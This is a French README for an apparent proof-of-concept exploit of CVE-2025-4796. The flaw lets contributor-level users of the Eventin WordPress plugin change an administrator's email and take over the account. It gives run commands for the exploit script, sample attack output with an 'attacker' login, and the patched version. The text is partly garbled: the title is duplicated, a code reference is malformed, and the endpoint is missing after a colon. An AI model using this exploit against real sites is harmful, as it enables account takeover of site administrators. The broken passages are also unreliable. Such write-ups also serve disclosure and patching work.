
eventin <= 4.0.34 - escalade de privilèges via changement d'email utilisateur / prise de contrôle de compte pour contributeur+ authentifié
eventin <= 4.0.34 - escalade de privilèges via changement d'email utilisateur / prise de compte pour contributeur authentifié+
bogue d'escalade de privilèges dans le plugin wordpress eventin (<= 4.0.34) qui permet à tout contributeur ou utilisateur de niveau supérieur de changer l'email de n'importe quel utilisateur via l'api de mise à jour des intervenants du plugin. en changeant l'email d'un administrateur par un email que l'attaquant contrôle, ce dernier peut réinitialiser le mot de passe et prendre le contrôle du compte.
eventin\speaker\api\speakercontroller::update_item)eventin ne vérifie pas correctement qui demande la mise à jour ni s'il est autorisé à changer l'email de l'utilisateur. un contributeur ou un utilisateur de niveau supérieur peut appeler ce point de terminaison :
prérequis :
installation de requests :
pip install requests
exécutez le script et saisissez les valeurs demandées :
python3 CVE-2025-4796.py
[+] désactivation des avertissements de vérification ssl
[+] connexion à wordpress.
[+] connexion réussie.
[+] récupération du jeton nonce
[+] jeton nonce trouvé : abcdef1234567890
[+] requête de mise à jour de l'email de l'intervenant
[+] opération de mise à jour réussie.
url: http://example.com
id: 123
email: [email protected].
user: attacker
pass: yourpassword
{.
"id": 123,
"email": "[email protected]",
"name": "Speaker Name",
...
}.
un correctif a été publié dans la version 4.0.35 du plugin eventin. Les administrateurs du site sont fortement invités à mettre à jour vers cette version immédiatement. Le correctif inclut des validations utilisateur supplémentaires dans la fonction SpeakerController::update_item